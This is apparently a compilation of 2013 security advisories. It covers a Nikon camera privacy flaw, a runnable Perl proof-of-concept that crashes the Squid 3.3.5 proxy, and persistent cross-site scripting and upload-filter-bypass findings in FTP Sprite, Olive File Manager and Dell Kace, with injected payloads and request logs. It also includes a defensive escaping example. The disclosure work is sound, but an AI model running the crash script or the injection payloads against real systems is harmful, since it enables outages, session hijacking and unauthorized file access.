(Copy of the Vendor Homepage: http://www.europe-nikon.com/en_GB/product/digital-cameras/coolpix/life/coolpix-l27 )

Abstract:
=========
The Vulnerability Laboratory Research Team discovered an information disclosure issue in the Nikon CoolPix Digital Camera L25 with Firmware 1.0.

Report-Timeline:
================
2013-07-16: Public Disclosure (Vulnerability Laboratory)

Status:
========
Published

Affected Products:
==================
Nikon
Product: COOLPIX L25 L27 & L28

Exploitation-Technique:
=======================
Hardware

Severity:
=========
Medium

Details:
========
An information disclosure issue is detected in the official Nikon Camera L Series 25, 28 & maybe others. The information disclosure bug allows remote attackers to access sensitive information of other people, websites, servers or companies.

The privacy issue is located in the Menu > System module when saving a start bild (start picture) that is shown while the camera system boots. The camera allows a start bild (start picture) to be saved and does not remove it when a format or firmware reset is performed. People with access to the device can see, in the short review of the start bild (start picture), the earlier deleted pictures. The device does not recognize this and keeps the pictures stored without any possibility to delete them.

In a scenario on eBay we bought a Nikon camera from a private seller. He used the camera for about 2 years for his holiday trips and conferences. He stated in a mail that the camera got a format and firmware reset. When the camera arrived at our location we were looking into the short review of the start bild (start picture) and saw several images of the owner.

Proof of Concept:
=================
The information disclosure issue can be reproduced by local attackers with physical camera device access. Steps to reproduce ...

1. Start the Nikon L series camera
2. Go into the camera screen mode and take a nice picture
3. Go to System > Start Bild
4. Choose your own picture and save it as start picture
5. Now shut down the camera the regular way and start it again after some seconds
6. The image of us will be visible when the system boots
7. Go to the Menu, go to System and format the device
8. Go to Menu again and switch to System
9. After the format we now reset the device
10. Shut down the Nikon Camera and take out the SD card of course
11. Restart it and go to the menu, open the start bild (start picture) module
12. Now the image of us is visible even though we did a full hardware reset or format
13. Information Disclosure issue in Nikon L Series successfully reproduced!

Note: When the image is saved in the camera as start picture, no format & no firmware reset can remove it anymore.

Solution:
=========
To fix the vulnerability, the firmware reset or format must remove all pictures from the review menu as well.

Risk:
=====
The security risk of the information disclosure issue is estimated as medium(-).

Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com)

Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.
  17. Description : Squid version 3.3.5 remote denial of service crash exploit.
  Author : Kingcope
  Source : Squid 3.3.5 Denial Of Service ≈ Packet Storm
  Code :

#Squid Crash PoC
#Copyright (C) Kingcope 2013
#tested against squid-3.3.5
#this seems to be the patch for the vulnerability:
#http://www.squid-cache.org/Versions/v3/3.3/squid-3.3.8.patch
#The squid-cache service will respawn, looks like a kind of assert exception:
#2013/07/15 20:48:36 kid1| Closing HTTP port 0.0.0.0:3128
#2013/07/15 20:48:36 kid1| storeDirWriteCleanLogs: Starting...
#2013/07/15 20:48:36 kid1| Finished. Wrote 0 entries.
#2013/07/15 20:48:36 kid1| Took 0.00 seconds ( 0.00 entries/sec).
#FATAL: Bungled (null) line 9: snmp_access deny all
#Squid Cache (Version 3.2.11): Terminated abnormally.
#CPU Usage: 0.020 seconds = 0.012 user + 0.008 sys
#Maximum Resident Size: 33312 KB
#Page faults with physical i/o: 0
#Memory usage for squid via mallinfo():
# total space in arena: 4100 KB
# Ordinary blocks: 4046 KB 7 blks
# Small blocks: 0 KB 0 blks
# Holding blocks: 564 KB 2 blks
# Free Small blocks: 0 KB
# Free Ordinary blocks: 53 KB
# Total in use: 4610 KB 112%
# Total free: 53 KB 1%
#2013/07/15 20:48:39 kid1| Starting Squid Cache version 3.2.11 for i686-pc-linux-gnu...
#2013/07/15 20:48:39 kid1| Process ID 2990

use IO::Socket;

# connect to the proxy under test (address and port from the original PoC)
my $sock = IO::Socket::INET->new(PeerAddr => '192.168.27.146', PeerPort => '3128', Proto => 'tcp')
    or die "connect failed: $!";

# 4000-byte junk string used as the port component of the Host header
$a = "yc" x 2000;
print $sock "HEAD http://yahoo.com/ HTTP/1.1\r\nHost: yahoo.com:$a\r\n\r\n";

# echo whatever the proxy sends back before it dies
while (<$sock>) { print; }
  18. Description : FTP Sprite version 1.2.1 for iOS suffers from a persistent script insertion vulnerability.
  Author : Benjamin Kunz Mejri
  Source : FTP Sprite 1.2.1 Script Insertion ≈ Packet Storm
  Code :

Title:
======
FTP Sprite v1.2.1 iOS - Persistent Web Vulnerability

Date:
=====
2013-07-12

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=1007

VL-ID:
=====
1007

Common Vulnerability Scoring System:
====================================
3.7

Introduction:
=============
FTP Sprite can turn your iPhone, iPad, iPod into an FTP client, download files from an FTP server and upload files to an FTP server.

** FTP Action
** Add, modify, delete ftp server
** Download multiple files/folder Supported
** Upload multiple files/folder Supported
** Living progress
** View files online
** Create folder online
** Download and upload history
** Sorting by file name, create date and file size
** Local File Sharing
** USB File Sharing via iTunes
** Http File Sharing via WiFi, Support Safari, chrome, firefox and IE6/7/8/9
** Chrome and Firefox Supported upload multiple files
** Email multiple files/folder Supported
** Open files using other applications
** Local File Manage
** New Folder
** Sorting by file name, create date and file type
** View, copy, move, delete, rename, email, zip Compression and unzip files/folders
** Glide deleting function
** Select all and Cancel all
** Photo import Supported
** Bookmark supported
** File View
** New plain text (default encoding UTF-8), Convert plain file encoding (Unicode, UTF-8 etc) [.txt]
** External file content copy or paste
** Photo View, Zoom [.png .jpg .jpeg .gif .bmp .xbm .tif .tiff etc];
** Document reader [.pdf .rtf .csv .rtfd .doc .docx .xls .xlsx .ppt .pptx (office 2003 or later) etc]
** Video Player [.mp4]
** File Compression and Decompression [.zip .rar]
** Extract files from encryption .rar
** Multi-touch Supported, Zoom files
** Landscape mode supported
** iPad-compatible

(Copy of the Vendor Homepage: https://itunes.apple.com/de/app/ftp-sprite+/id480523641 )

Abstract:
=========
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the FTP Sprite 1.2.1 application (Apple iOS - iPad & iPhone).

Report-Timeline:
================
2013-07-12: Public Disclosure (Vulnerability Laboratory)

Status:
========
Published

Affected Products:
==================
Apple AppStore
Product: FTP Sprite - Application 1.2.1

Exploitation-Technique:
=======================
Remote

Severity:
=========
Medium

Details:
========
A persistent input validation web vulnerability is detected in the FTP Sprite 1.2.1 application (Apple iOS - iPad & iPhone). The bug allows an attacker (remote) to implement/inject malicious script code on the application side (persistent) of the app.

The vulnerability is located in the index file dir listing module of the web-server (http://localhost:41495) when processing to display manipulated `folder names` injected via POST request method. The persistent script code will be executed in the main index file dir listing module when the service lists the newly injected malicious foldername as an item. Exploitation of the persistent web vulnerability requires low or medium user interaction and no application user account.

Successful exploitation of the vulnerability can lead to persistent session hijacking (customers), account stealing via persistent web attacks, persistent phishing or stable (persistent) certificate mail notification context manipulation.

Vulnerable Application(s):
[+] FTP Sprite v1.2.1 - ITunes or AppStore (Apple)

Vulnerable Module(s):
[+] Add Folder

Vulnerable Parameter(s):
[+] foldername

Affected Module(s):
[+] Index Folder Listing

Proof of Concept:
=================
The persistent input validation web vulnerability can be exploited by remote attackers without a privileged application user account and with low user interaction. For demonstration or reproduce ...

PoC: Add Folder - (Name)

<div class="ProgressBar" id="barDiv">
<div id="bar"><span id="barSpan">0%</span></div>
</div>
</form>
</div>
<table id="tableContent" border="0" cellpadding="0" cellspacing="0">
<thead>
<tr><th><input id="selecteAll" onclick="selectAll(this)" type="checkbox"></th>
<th>Name</th><th>Size</th><th>Modified Date</th><th><img src="/download.png" style="border:0;vertical-align:middle;"></th>
<th class="del">Delete</th></tr>
</thead>
<tbody id="filelist"><tr><td><input name="chxItem" value="[PERSISTENT INJECTED SCRIPT CODE!]" onclick="selChkItem(this)" type="checkbox"></td><td><a href="/http%3[PERSISTENT INJECTED SCRIPT CODE!]?guid=E798C174-F7C4-462D-AFC3-12ECC1A36E84&amp;type=child" class="file"><span style="vertical-align:middle;"><img src="/Folder.png" style="border:0;vertical-align:middle;"></span> <iframe src="http:</a"></td><td></td><td>2013-07-11 20:14:33</td><td></td><td><input name="commit" type="button" value="Delete" onclick="DelegateData('/%3Ciframe%20src%3Dhttp%3[PERSISTENT INJECTED SCRIPT CODE!]','E798C174-F7C4-462D-AFC3-12ECC1A36E84');" class='button' /></form></td></tr></tbody></table></iframe></a></td></tr>

--- Request Session Log ---

Status: 200[OK]
POST http://192.168.2.104:41495/?type=createdir&guid=EFB7891B-84ED-4C48-A404-95960BBB95D0
Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] Content Size[506] Mime Type[text/plain]
Request Headers:
Host[192.168.2.104:41495]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0]
Accept[text/html, */*; q=0.01]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
X-Requested-With[XMLHttpRequest]
Referer[http://192.168.2.104:41495/?guid=EFB7891B-84ED-4C48-A404-95960BBB95D0&type=child&date=Thu%20Jul%2011%202013%2020:05:48%20GMT+0200&type=child&date=Thu%20Jul%2011%202013%2020:06:26%20GMT+0200&type=child&date=Thu%20Jul%2011%202013%2020:07:33%20GMT+0200]
Content-Length[87]
Connection[keep-alive]
Pragma[no-cache]
Cache-Control[no-cache]
Post Data:
item0[%3Ciframe%20src%3Dhttp%3A%2F%2Fwww.vuln-lab.com%20onload%3Dalert(%22BKM%22)%20%3C]
Response Headers:
Accept-Ranges[bytes]
Content-Length[506]
Content-Type[text/plain]
Date[Thu, 11 Jul 2013 18:14:33 GMT]

20:08:50.658[40ms][total 40ms] Status: 404[Not Found]
GET http://192.168.2.104:41495/%3C/a
Load Flags[LOAD_DOCUMENT_URI ] Content Size[0] Mime Type[application/x-unknown-content-type]
Request Headers:
Host[192.168.2.104:41495]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://192.168.2.104:41495/?guid=EFB7891B-84ED-4C48-A404-95960BBB95D0&type=child&date=Thu%20Jul%2011%202013%2020:05:48%20GMT+0200&type=child&date=Thu%20Jul%2011%202013%2020:06:26%20GMT+0200&type=child&date=Thu%20Jul%2011%202013%2020:07:33%20GMT+0200]
Connection[keep-alive]
Response Headers:
Accept-Ranges[bytes]
Content-Length[0]
Date[Thu, 11 Jul 2013 18:14:34 GMT]

Solution:
=========
To fix the vulnerability, parse and restrict the add folder name input field, but also clean up the output of the affected listing module.

Risk:
=====
The security risk of the persistent input validation web vulnerability is estimated as high(-).

Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com)
  19. Description : Olive File Manager version 1.0.1 for iOS suffers from arbitrary file upload and cross site scripting vulnerabilities.
  Author : Benjamin Kunz Mejri
  Source : Olive File Manager 1.0.1 Arbitrary File Upload / XSS ≈ Packet Storm
  Code :

Title:
======
Olive File Manager v1.0.1 iOS - Multiple Vulnerabilities

Date:
=====
2013-07-13

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=1009

VL-ID:
=====
1009

Common Vulnerability Scoring System:
====================================
5.6

Introduction:
=============
A powerful file manager and well-designed office suite. Multiple features all in one app, coming with new functions every 2 weeks! These are all in Olive File Manager! Once you have it, ask for nothing else!

Powerful file manager: Retain your use habits with PC file manager such as copy and paste. Capable of opening documents like mail attachments from other apps. Support for multiple display modes (e.g. list, thumbnail, grid), sending documents as mail attachments, screening display, sorting and searching documents, etc.

A wireless USB flash disk
A compressing & decompressing tool
An encrypted safe box
An e-book reader
A GoogleDocs terminal
A Dropbox terminal
A picture viewer
A music player
A video player

Office Suite: Multiple formats supported, including doc, docs, xls, xlsx, ppt, pptx, pdf, txt, rtf, html, iwork, etc.
Wireless USB flash disk: This enables you to transfer your files from your USB disk to your iPad through WIFI.
Compressing & decompressing: Support for decompression and package compression for .zip and .rar files.
Encrypted safe box: You can set a password on your Olive File Manager and never need to worry about your documents being exposed when someone is playing with your iPad.
Cloud: GoogleDocs and Dropbox support is available with the function of synchronous upload and download of files (more cloud support is under development).
Picture Viewer: Support for common image formats such as .png, .bmp and .jpg.
Music & Video Player: Support for common video formats including MP3, AAC, 3GP, avi, au, wav, MP4, mov and m4a

(Copy of the Vendor Homepage: https://itunes.apple.com/de/app/olive-file-manager/id529493702 )

Abstract:
=========
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the Olive File Manager v1.0.1 application (Apple iOS - iPad & iPhone).

Report-Timeline:
================
2013-07-13: Public Disclosure (Vulnerability Laboratory)

Status:
========
Published

Affected Products:
==================
Apple AppStore
Product: Olive File Manager Wifi 1.0.1

Exploitation-Technique:
=======================
Remote

Severity:
=========
High

Details:
========
1.1
A local file include and arbitrary file upload web vulnerability is detected in the Olive File Manager v1.0.1 application (Apple iOS - iPad & iPhone). The vulnerability allows remote attackers to upload files via POST method with multiple extensions and then access them without authorization on the application side of the service.

The vulnerability is located in the file upload/add module of the web-server (http://localhost:8797/) when processing a manipulated filename requested via POST. The injected file will be accessible via the index listing module of the web application. Remote attackers can exchange the filename with a double or triple extension via POST method to bypass the upload validation and filter process. After the upload the attacker accesses the file with one extension and exchanges it with the other one to execute, for example, php code.

A persistent script code injection is detected in the filename parameter. Attackers can tamper with the request and exchange the file name with persistent malicious script code or tags. The code will be executed in the main index site when processing to list the object (file) items. Attackers are also able to inject persistent code with local frame requests to gain unauthorized access to application data/apps or restricted application information. The execution of the persistent code also occurs when an application user refreshes, updates or deletes the malicious web context.

Exploitation of the vulnerability requires no user interaction and no privileged application user account (no password by default). Successful exploitation of the vulnerability results in unauthorized path or file access via local file include or arbitrary file upload.

Vulnerable Application(s):
[+] Olive File Manager v1.0.1 - ITunes or AppStore (Apple)

Vulnerable Module(s):
[+] File Upload (Web Server) [Remote]

Vulnerable File(s):
[+] AirDriveAction_file_add

Vulnerable Parameter(s):
[+] filename

Affected Module(s):
[+] Application Index File Listing (http://localhost:8797/)

1.2
A persistent input validation web vulnerability is detected in the Olive File Manager v1.0.1 application (Apple iOS - iPad & iPhone). The bug allows an attacker (remote) to implement/inject malicious script code on the application side (persistent) of the app.

The vulnerability is located in the index file dir listing module of the web-server (http://localhost:8797/) when processing to display manipulated `folder names` injected via POST request method. The persistent script code will be executed in the main index file dir listing module when the service lists the newly injected malicious foldername as an item. Exploitation of the persistent web vulnerability requires low or medium user interaction and no application user account.

Successful exploitation of the vulnerability can lead to persistent session hijacking (customers), account stealing via persistent web attacks, persistent phishing or stable (persistent) certificate mail notification context manipulation.

Vulnerable Application(s):
[+] Olive File Manager v1.0.1 - ITunes or AppStore (Apple)

Vulnerable Module(s):
[+] Add Folder

Vulnerable Parameter(s):
[+] foldername

Affected Module(s):
[+] Index Folder Listing (http://localhost:8797/)

Proof of Concept:
=================
1.1
The file include and arbitrary file upload vulnerability can be exploited by remote attackers without a privileged application user account and without required user interaction. For demonstration or reproduce ...

PoC: Filename

<div class="file_list_container"><div class="file_list_item"><table height="50px" border="0" cellpadding="0" cellspacing="0" width="100%"><tbody><tr><td align="center" valign="middle" width="50"></td><td align="left" valign="middle" width="*"><a href="..">..</a> </td></tr></tbody></table></div>
<div class="file_list_item"><table height="50px" border="0" cellpadding="0" cellspacing="0" width="100%"><tbody><tr><td align="center" valign="middle" width="50"></td><td align="left" valign="middle" width="*"><a href="<[LOCAL FILE/PATH REQUEST!]"></a> (Size:27,27 Kb, Last Modified:2013-07-12 18:34:15)<br /> </td></tr></tbody></table></div>
<div class="file_list_item"><table width="100%" height="50px" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td width="50" align="center" valign="middle"></td><td width="*" align="left" valign="middle"><a href=">">[LOCAL FILE/PATH REQUEST!]></a> (Size:27,27 Kb, Last Modified:2013-07-12 18:33:42)<br /> </td></tr></tbody></table></div></div></div>
<div class="footer"><div class="footer_text">Copyright © 2008 OliveOffice,Inc. </div></div></body></html></iframe></a></td></tr></tbody></table></div></div>

--- POST Method Request Log ---

POST_DATA[-----------------------------151253266715950
Content-Disposition: form-data; name="file"; filename=">"[LOCAL FILE/PATH REQUEST!]>.png"
Content-Type: image/png

1.2
The persistent input validation web vulnerability can be exploited by remote attackers without a privileged application user account and with low or medium required user interaction. For demonstration or reproduce ...

PoC: Foldername

<div class="file_list_container"><div class="file_list_item"><table height="50px" border="0" cellpadding="0" cellspacing="0" width="100%"><tbody><tr><td align="center" valign="middle" width="50"></td><td align="left" valign="middle" width="*"><a href="..">..</a> </td></tr></tbody></table></div>
<div class="file_list_item"><table height="50px" border="0" cellpadding="0" cellspacing="0" width="100%"><tbody><tr><td align="center" valign="middle" width="50"></td><td align="left" valign="middle" width="*"><a href="%20[PERSISTENT INJECTED SCRIPT CODE!]>" <[PERSISTENT INJECTED SCRIPT CODE!]">/">%20> "<[PERSISTENT INJECTED SCRIPT CODE!]">/</a> (Size:0 Kb, Last Modified:2013-07-12 18:26:31)<br /> </td></tr></tbody></table></div></div></div>
<div class="footer"><div class="footer_text">Copyright © 2008 OliveOffice,Inc. </div></div></body></html></iframe></a></td></tr></tbody></table></div></div>

Solution:
=========
1.1
The arbitrary file upload web vulnerability and the upload filter bypass issue is estimated as high(+).
1.2
The security risk of the persistent input validation vulnerabilities is estimated as high(-).

Risk:
=====
The security risk of the persistent input validation web vulnerability is estimated as high(-).

Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com)
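The FTP Sprite (item 18) and Olive File Manager (item 19) findings share one root cause: a built-in web server stores user-supplied folder and file names and later echoes them into its HTML index listing without escaping, and Olive additionally lets a multi-extension filename through its upload filter. The following is an added defensive example written for this page, not code from either app or from the advisories; the extension allow-list, the `ALLOWED_EXTENSIONS` name and the listing-row template are assumptions.

```python
import html
import re
from dataclasses import dataclass
from urllib.parse import quote

# Assumed upload policy (hypothetical; neither app publishes one).
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif", "txt", "pdf", "zip"}

# Characters that must never reach a filesystem path or an HTML listing raw:
# markup delimiters, quotes, path separators and control characters.
_FORBIDDEN = re.compile(r'[<>"\'/\\\x00-\x1f]')


@dataclass
class ValidationResult:
    ok: bool
    reason: str = ""


def validate_upload_name(name: str) -> ValidationResult:
    """Input-side check for an uploaded filename.

    Rejects the patterns the advisories describe: markup in the name and
    double/triple extensions such as 'x.php.png' that slip past a filter
    which only looks at the last extension.
    """
    if not name or len(name) > 255:
        return ValidationResult(False, "empty or too long")
    if name.startswith("."):
        return ValidationResult(False, "dot or hidden name")
    if _FORBIDDEN.search(name):
        return ValidationResult(False, "forbidden character")
    parts = name.split(".")
    if len(parts) != 2:
        # 'x' (no extension) and 'x.php.png' (two extensions) both fail here
        return ValidationResult(False, "exactly one extension required")
    stem, ext = parts
    if not stem or ext.lower() not in ALLOWED_EXTENSIONS:
        return ValidationResult(False, "extension not allowed")
    return ValidationResult(True)


def validate_folder_name(name: str) -> ValidationResult:
    """Input-side check for a new folder name (the FTP Sprite 'foldername' case)."""
    if not name or len(name) > 255:
        return ValidationResult(False, "empty or too long")
    if name in (".", "..") or _FORBIDDEN.search(name):
        return ValidationResult(False, "forbidden character")
    return ValidationResult(True)


def render_listing_row(name: str, is_dir: bool) -> str:
    """Output-side fix: escape the stored name for each context it lands in.

    Validation can be bypassed or skipped by older stored entries, so the
    listing itself must encode the name: HTML-escaped for attribute and text
    content, percent-encoded for the href.  A name like '<iframe src=x>'
    then renders as inert text instead of a live element.
    """
    safe_text = html.escape(name, quote=True)   # &lt; &gt; &quot; &#x27; &amp;
    safe_href = quote(name, safe="")            # %3C %3E %20 ... for the URL
    icon = "/Folder.png" if is_dir else "/File.png"
    return (
        f'<tr><td><input name="chxItem" value="{safe_text}" type="checkbox"></td>'
        f'<td><a href="/{safe_href}" class="file"><img src="{icon}">{safe_text}</a></td></tr>'
    )


if __name__ == "__main__":
    # Constructed sample names; the last one mimics the advisories' markup injection.
    for sample in ("holiday.png", "shell.php.png", "<iframe src=x>"):
        print(sample, validate_upload_name(sample), validate_folder_name(sample))
    print(render_listing_row("<iframe src=x>", is_dir=True))
```

The two layers are independent on purpose: validation keeps bad names out of storage, and output encoding makes a listing safe even for names that were stored before the check existed.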
  20. Description : Dell Kace 1000 SMA version 5.4.70402 suffers from multiple cross site scripting vulnerabilities. Author : Ibrahim El-Sayed Source : Dell Kace 1000 SMA 5.4.70402 Cross Site Scripting ? Packet Storm Code : Title: ====== Dell Kace 1000 SMA v5.4.70402 - Persistent Vulnerabilities Date: ===== 2013-07-16 References: =========== http://www.vulnerability-lab.com/get_content.php?id=833 VL-ID: ===== 833 Common Vulnerability Scoring System: ==================================== 3.5 Introduction: ============= Dell KACE is to provide an appliance-based approach to systems management, to create time for systems administration professionals, while saving money for their companies. Dell KACE Systems Management Appliances are available as both physical and virtual appliances. The KACE Management Appliance delivers a fully integrated systems management solution, unlike traditional software approaches that can require complex and time-consuming deployment and maintenance. KACE accomplishes this via an extremely flexible, intelligent appliance-based architecture that typically deploys in days and is self maintaining. The KACE Management Appliance also provides direct access to time-saving ITNinja systems management community information using AppDeploy Live, the leading destination for end point administrators. The result: Comprehensive systems management that is easy-to-use and that can be more economical than software only alternatives. Read more in the white paper KACE K1000 Management Appliance Architecture: Harnessing the Power of an Appliance-based Architecture. The KACE Management Appliance is designed for enterprises and business units with up to 20,000 nodes. (Copy of the Vendor Homepage: http://www.kace.com/products/systems-management-appliance ) Abstract: ========= The Vulnerability Laboratory Research Team discovered a web session vulnerability in Dell Kace K1000, Systems Management Appliance. 
Report-Timeline: ================ 2013-01-24: Researcher Notification & Coordination 2013-02-06: Vendor Notification 2013-02-08: Vendor Response/Feedback 2013-**-**: Vendor Fix/Patch 2013-07-16: Public Disclosure Status: ======== Published Affected Products: ================== DELL Product: Kace K1000 SMA 5.4.70402 Exploitation-Technique: ======================= Remote Severity: ========= Medium Details: ======== Multiple persistent input validation web vulnerabilities are detected in Dell Kace K1000, Systems Management Appliance. The vulnerabilityallows an attacker to inject own malicious script code in the vulnerable module on application side (persistent). The first vulnerability is located in the `Inventory` module with the bound vulnerable Ip-address, Mac, Os Name, Service pack, Notes and Label Name parameters. The persistent injected script code will be executed directly out of the `Computer` listing when processing to manage the earlier inserted machines in dbms context. The second vulnerability is located in the `Distribution` module with the bound vulnerable Machine Name and Mac address parameters. The persistent injected script code will be executed directly out of the `Walk-on-lan` exception handling mechanism when a malicious data is inserted in the vulnerable fields. Successful exploitation of the vulnerabilities result in persistent session hijacking, persistent phishing, persistent external redirects, persistent external malware loads via inject and persistent vulnerable module web context manipulation. 
Vulnerable Section(s): [+] Inventory => Computers [+] Inventory => Computers [+] Distribution => Wake-on-lan Vulnerable Module(s): [+] Add New Item [+] Add Label [+] Add new Item Vulnerable Parameter(s): [+] [Ip-address] [Mac] [Os Name] [Service pack] [Notes] [+] [Label Name] [+] [Machine Name] [Mac address] Affected Modules(s): [+] Inventory => Computers [+] Inventory => Computers => Choose Action Menu => Apply label [+] Distribution => Wake-on-lan =>Exception handeling Proof of Concept: ================= The vulnerability can be exploited by remote attackers with low user interaction and low privilege application user account. For demonstration or reproduce ... 1.1 URL: https://pub23.127.0.0.1:1336/adminui/machine.php?ID=1 Affected Module: Inventory => Computers Code Review: <div style="margin-left:15px; color: #005FA9; font-family:Verdana,Arial,Helvetica,sans-serif; font-size:10px; font-weight:300;"> <script type="text/javascript" src="/common/js/scw.js"></script> <script type="text/javascript"> // this will get set at the end of the page, after we've generated all the dynamic sections var gLastSectionId = 0; </script> [<a href="#" onclick='expandAllDetail(gLastSectionId, 1);'>Expand All</a>] [<a href="#" onclick='expandAllDetail (gLastSectionId);printSpecial()'>Printer Friendly Version</a>] [<a href="history_log.php?HISTORY_TYPE=ASSET&TYPE_NAME= Computer&TYPE_ID=8&NAME=%26lt%3Bh1%26gt%3BName%26lt%3B%2Fh1%26gt%3B&SHOW_ALL=1" onclick='logPopup(this); return false;'>Show All History</a>] <div id="printReady" style="margin-top:2px;"> <table border="0" cellspacing="0" cellpadding="0" style="border-collapse:collapse;width:70%;"> <tbody> <tr class="detail_page_section_heading_no_cursor"> <td colspan="3"> <a style="cursor: pointer;cursor: hand;" onclick="hideShowDetail('section1',null,'','',''); return false;">Summary</a> </td> </tr> </tbody> <tbody id="section1" style="display:none;"> <tr valign="top" class="rowHighlightData"><td width="1%"> </td><td 
style="width:150px;min- width:100px;">Name:</td><td><h1>Name</h1></td></tr> <tr valign="top" class="rowData"><td width="1%"> </td> <td style="width:150px;min-width:100px;">Manual Entry:</td><td>Manually Entered Record, no communication with the server [<a href="/adminui/machine_edit.php?ID=2">Edit</a>]</td></tr> <tr valign="top" class="rowHighlightData"><td width="1%"> </td> <td style="width:150px;min-width:100px;">IP Address:</td><td>[PERSISTENT INJECTED SCRIPT CODE!] <select onchange=" if(this.options[this.selectedIndex].value=='1') MachineAction('<h1>Ip-Address</h1>','<h1>Name</h1>', 2, encodeURI('mstsc.exe /v:KACE_HOST_IP /w:900 /h:800'));"> <option value="">Action...</option><option title="Launch: mstsc.exe /v:KACE_HOST_IP /w:900 /h:800" value="1">Action 1</option></select></td></tr> <tr valign="top" class="rowData"><td width="1%"> </td><td style="width:150px;min-width:100px;">MAC:</td><td>[PERSISTENT INJECTED SCRIPT CODE!]</td> </tr> <tr valign="top" class="rowHighlightData"><td width="1%"> </td><td style="width:150px;min-width:100px;"> Processors:</td><td>[PERSISTENT INJECTED SCRIPT CODE!]</td></tr> <tr valign="top" class="rowData"><td width="1%"> </td><td style="width:150px; min-width:100px;">OS Name:</td><td>[PERSISTENT INJECTED SCRIPT CODE!]v</td></tr> <tr valign="top" class="rowHighlightData"><td width="1%"> </td> <td style="width:150px;min-width:100px;">Service Pack:</td><td>[PERSISTENT INJECTED SCRIPT CODE!]</td></tr> <tr valign="top" class="rowData"> <td width="1%"> </td><td style="width:150px;min-width:100px;">Notes:</td><td>[PERSISTENT INJECTED SCRIPT CODE!]</td></tr> <tr valign="top" class="rowHighlightData"><td width="1%"> </td><td style="width:150px;min-width:100px;">Record Created:</td><td>01/28/2013 05:31:49</td></tr> <tr class="rowData"><td colspan="3"> </td></tr> </tbody><tbody><tr class="detail_page_group_heading"><td colspan="3">Inventory Information </td></tr></tbody> <tbody> <tr class="detail_page_section_heading_no_cursor"> <td 
colspan="3">
<a style="cursor: pointer;cursor: hand;" onclick="hideShowDetail('section2',null,'','',''); return false;">Hardware</a>
<span style="color:#909090"> [no changes]</span>
</td>
</tr>
</tbody>
<tbody id="section2" style="display:none;">
<tr valign="top" class="rowHighlightData"><td width="1%"> </td>
<td style="width:150px;min-width:100px;">Processors:</td><td>[PERSISTENT INJECTED SCRIPT CODE!]</td></tr>
<tr valign="top" class="rowData"><td width="1%"> </td><td style="width:150px;min-width:100px;">CD/DVD Drives:</td><td>[PERSISTENT INJECTED SCRIPT CODE!]</td></tr>
<tr valign="top" class="rowHighlightData"><td width="1%"> </td><td style="width:150px;min-width:100px;">Sound Devices:</td><td>[PERSISTENT INJECTED SCRIPT CODE!]</td></tr>
<tr valign="top" class="rowData"><td width="1%"> </td>
<td style="width:150px;min-width:100px;">Video Controllers:</td><td>[PERSISTENT INJECTED SCRIPT CODE!]</td></tr>
<tr valign="top" class="rowHighlightData"><td width="1%"> </td><td style="width:150px;min-width:100px;">Monitor: </td><td>[PERSISTENT INJECTED SCRIPT CODE!]</td></tr>
<tr class="rowData"><td colspan="3"> </td></tr>
</tbody><tbody>
<tr class="detail_page_section_heading_no_cursor">
<td colspan="3">
<a style="cursor: pointer;cursor: hand;" onclick="hideShowDetail ('section3',null,'','',''); return false;">Printers (1)</a>
</td>
...
1.2
URL: https://pub23.127.0.0.1:1336/adminui/computer_inventory.php
Affected Module: Inventory => Computers => choose action => Apply Label

Code Review:
<td class="inputFormat"><select name="FINDFIELDS[EXP_SELECT8]" id="FINDFIELDS[EXP_SELECT8]" onchange="$('FINDFIELDS[INPUT8]').disabled = ($F(this) == 'NULL' || $F(this) == 'NOT_NULL')" style="width:auto">
<option value="NOT_EQUAL" title="!=">!= </option>
<option value="GT" title=">">></option>
<option value="LT" title="<"><</option>
<option value="EQUALS" title="=">=</option>
<option value="BEGINS_WITH" title="begins with">begins with</option>
<option value="CONTAINS" title="contains">contains</option>
<option value="NOT_BEGINS_WITH" title="does not begin with">does not begin with</option>
<option value="NO_CONTAIN" title="does not contain">does not contain</option>
